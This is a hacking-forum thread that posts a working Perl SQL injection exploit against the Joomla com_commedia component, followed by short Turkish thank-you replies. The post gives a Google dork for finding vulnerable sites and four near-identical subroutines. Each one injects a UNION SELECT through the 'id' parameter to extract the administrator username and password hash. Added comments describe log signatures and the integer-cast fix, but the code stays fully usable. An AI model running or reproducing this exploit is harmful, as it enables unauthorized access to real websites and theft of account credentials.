Joomla Commedia 3.1 SQL Injection
#1
Exploit Title: Joomla commedia Remote Exploit

dork: inurl:index.php?option=com_commedia



Exploit:

#!/usr/bin/perl -w
########################################
# Joomla Component (commedia) Remote SQL Exploit
#----------------------------------------------------------------------------#
# Reviewer summary, taken from the code below:
#   * Each *_users sub sends one GET request of the form
#       index.php?option=com_commedia&format=raw&task=down&pid=59&id=<value>
#     where <value> carries a UNION ALL SELECT against the Joomla users table.
#     The response body is then searched for a username and a password hash.
#   * What a site owner can look for: access-log entries for
#     option=com_commedia whose `id` value contains "union", "select" or
#     "concat(0x", sent with the fixed MSIE 7.0 User-Agent set in each sub.
#   * The fix belongs in the component: `id` is presumably meant to be
#     numeric, so it should be cast to an integer or bound as a parameter
#     before it reaches the query.
#   * A non-default table prefix is not a defence on its own; the menu below
#     offers four prefixes to choose from.
########################################
# Banner and menu. The menu heading is Spanish for "users table prefix options".
print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print " :::Opciones de prefijo tabla users:::\n\n";
print " 1. jos_users 2. jml_users 3. muc_users 4. sgj_users \n\n\n";

use LWP::UserAgent;
use HTTP::Request;
use LWP:big_smileimple;

# Read the menu choice from STDIN. The value is not chomped; the numeric ==
# comparisons below ignore the trailing newline, and non-numeric input is
# compared by its numeric value (with a warning under -w).
print ":::Opcion::: ";
my $option=<STDIN>;
# Four independent tests, one per table prefix. `&name` without parentheses
# calls the sub with the caller's current @_. Any other input matches none of
# the tests, so no sub is called from here.
if ($option==1){&jos_users}
if ($option==2){&jml_users}
if ($option==3){&muc_users}
if ($option==4){&sgj_users}


# jos_users: variant for the "jos_" table prefix.
# Prompts for a base URL, sends a single GET request whose `id` parameter
# carries a UNION ALL SELECT against jos_users, and prints the username and
# password hash found in the response. Takes no arguments and returns nothing
# useful; all results go to STDOUT. The other three *_users subs in this file
# have the same body and differ only in $table.
# NOTE(review): apart from $target, every variable here is an undeclared
# package global (the file has no `use strict`), and $b is also Perl's
# sort-comparator variable.
sub jos_users {


# Prompt (Spanish: "Enter the site"). The value is used as typed; it is not
# validated before being concatenated into the request URL.
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

# Column holding the account name in the Joomla users table
$user="username";
# Column holding the password hash in the Joomla users table
$pass="password";
# Table the injected sub-select reads from
$table="jos_users";
# Query-string fragments. Joined below they give
#   option=com_commedia&format=raw&task=down&pid=59&id=<value>
# so the injected SQL travels in the `id` parameter of task "down".
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Fixed User-Agent. Together with the query-string shape above it gives a
# usable signature when searching web-server logs.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# The string literal spans four source lines, so its line breaks and spaces
# are part of the URL as written. 0x3c757365723e is the hex form of "<user>"
# and 0x3c706173733e of "<pass>"; the sub-select wraps the selected values in
# those markers so the regexes below can find them in the returned page.
# count(*) sits inside the same concat() as the column values.
# For defenders: `id` reaching the query unescaped is the root cause; casting
# it to an integer or binding it as a parameter in the component closes it.
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union
all select (select
concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from
".$table."),null--";
# One GET request. The HTTP status is never checked; the body is searched
# whatever the server answered.
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

# Text between the first pair of "<user>" markers, if present.
if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

# Text between the first pair of "<pass>" markers. The else below belongs to
# this test only, so the failure message depends on the <pass> match alone.
if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

# jml_users: variant for the "jml_" table prefix.
# Prompts for a base URL, sends a single GET request whose `id` parameter
# carries a UNION ALL SELECT against jml_users, and prints the username and
# password hash found in the response. Takes no arguments; output goes to
# STDOUT. Same body as the other *_users subs in this file except for $table.
# NOTE(review): apart from $target, the variables are undeclared package
# globals, and $b is also Perl's sort-comparator variable.
sub jml_users {


# Prompt (Spanish: "Enter the site"); the answer is concatenated into the URL
# without validation.
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

# Column holding the account name in the Joomla users table
$user="username";
# Column holding the password hash in the Joomla users table
$pass="password";
# Table the injected sub-select reads from
$table="jml_users";
# Query-string fragments; joined below they give
#   option=com_commedia&format=raw&task=down&pid=59&id=<value>
# which places the injected SQL in the `id` parameter.
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Fixed User-Agent string; useful as a log-search signature alongside
# option=com_commedia.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# Multi-line string literal: the line breaks are part of the URL as written.
# 0x3c757365723e = "<user>" and 0x3c706173733e = "<pass>" in hex; they are
# markers placed around the selected values for the regexes below.
# Requests to this component whose `id` contains "union", "select" or
# "concat(0x" are the pattern to alert on; the component-side fix is to cast
# or bind `id` before it reaches the query.
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union
all select (select
concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from
".$table."),null--";
# Single GET; the response status is not inspected.
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

# First "<user>...<user>" span in the body, if any.
if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

# First "<pass>...<pass>" span. The else is attached to this test only, so
# the failure message reflects the <pass> match and nothing else.
if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

# muc_users: variant for the "muc_" table prefix.
# Prompts for a base URL, sends a single GET request whose `id` parameter
# carries a UNION ALL SELECT against muc_users, and prints the username and
# password hash found in the response. Takes no arguments; output goes to
# STDOUT. Same body as the other *_users subs in this file except for $table.
# NOTE(review): apart from $target, the variables are undeclared package
# globals, and $b is also Perl's sort-comparator variable.
sub muc_users {


# Prompt (Spanish: "Enter the site"); the answer is concatenated into the URL
# without validation.
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

# Column holding the account name in the Joomla users table
$user="username";
# Column holding the password hash in the Joomla users table
$pass="password";
# Table the injected sub-select reads from
$table="muc_users";
# Query-string fragments; joined below they give
#   option=com_commedia&format=raw&task=down&pid=59&id=<value>
# which places the injected SQL in the `id` parameter.
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Fixed User-Agent string; useful as a log-search signature alongside
# option=com_commedia.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# Multi-line string literal: the line breaks are part of the URL as written.
# 0x3c757365723e = "<user>" and 0x3c706173733e = "<pass>" in hex; they are
# markers placed around the selected values for the regexes below.
# Requests to this component whose `id` contains "union", "select" or
# "concat(0x" are the pattern to alert on; the component-side fix is to cast
# or bind `id` before it reaches the query.
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union
all select (select
concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from
".$table."),null--";
# Single GET; the response status is not inspected.
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

# First "<user>...<user>" span in the body, if any.
if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

# First "<pass>...<pass>" span. The else is attached to this test only, so
# the failure message reflects the <pass> match and nothing else.
if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

# sgj_users: variant for the "sgj_" table prefix.
# Prompts for a base URL, sends a single GET request whose `id` parameter
# carries a UNION ALL SELECT against sgj_users, and prints the username and
# password hash found in the response. Takes no arguments; output goes to
# STDOUT. Same body as the other *_users subs in this file except for $table.
# NOTE(review): apart from $target, the variables are undeclared package
# globals, and $b is also Perl's sort-comparator variable.
sub sgj_users {


# Prompt (Spanish: "Enter the site"); the answer is concatenated into the URL
# without validation.
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

# Column holding the account name in the Joomla users table
$user="username";
# Column holding the password hash in the Joomla users table
$pass="password";
# Table the injected sub-select reads from
$table="sgj_users";
# Query-string fragments; joined below they give
#   option=com_commedia&format=raw&task=down&pid=59&id=<value>
# which places the injected SQL in the `id` parameter.
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Fixed User-Agent string; useful as a log-search signature alongside
# option=com_commedia.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# Multi-line string literal: the line breaks are part of the URL as written.
# 0x3c757365723e = "<user>" and 0x3c706173733e = "<pass>" in hex; they are
# markers placed around the selected values for the regexes below.
# Requests to this component whose `id` contains "union", "select" or
# "concat(0x" are the pattern to alert on; the component-side fix is to cast
# or bind `id` before it reaches the query.
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union
all select (select
concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from
".$table."),null--";
# Single GET; the response status is not inspected.
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

# First "<user>...<user>" span in the body, if any.
if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

# First "<pass>...<pass>" span. The else is attached to this test only, so
# the failure message reflects the <pass> match and nothing else.
if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}


#2
Eline sağlık abi exciting
#3
(15-09-2014, Saat: 22:05)Symxq Adlı Kullanıcıdan Alıntı: Eline sağlık abi exciting

Teşekkürler Abi Demene Gerek Yok Kardeşim exciting
#4
Teşekkürler
www.deccal.org

